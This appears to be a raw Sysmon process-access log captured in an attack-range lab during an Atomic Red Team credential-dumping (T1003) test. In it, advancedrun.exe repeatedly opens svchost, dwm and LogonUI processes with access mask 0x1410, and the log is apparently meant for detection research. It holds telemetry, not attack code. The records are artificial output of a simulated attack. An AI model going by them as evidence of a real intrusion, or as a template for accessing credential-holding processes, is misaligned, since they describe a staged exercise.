17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003980116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003980109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 